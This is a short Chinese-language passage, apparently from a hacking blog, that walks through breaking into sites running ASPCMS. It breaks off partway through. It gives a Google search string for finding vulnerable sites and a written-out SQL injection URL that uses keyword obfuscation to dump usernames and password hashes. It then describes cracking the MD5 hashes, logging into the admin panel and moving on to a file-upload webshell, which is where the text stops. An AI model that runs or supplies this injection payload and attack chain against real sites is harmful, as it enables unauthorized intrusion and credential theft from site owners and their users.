【社工方法】(不推荐)
1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人
2.接着利用注入漏洞
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user
然后登陆https://www.somd5.com/来解md5
3.去登陆后台 ,登陆成功
然后搜了一下aspcms 的文件上传get webshell
https://www.i0day.com/1595.html
我们来尝试一下
我们点击修改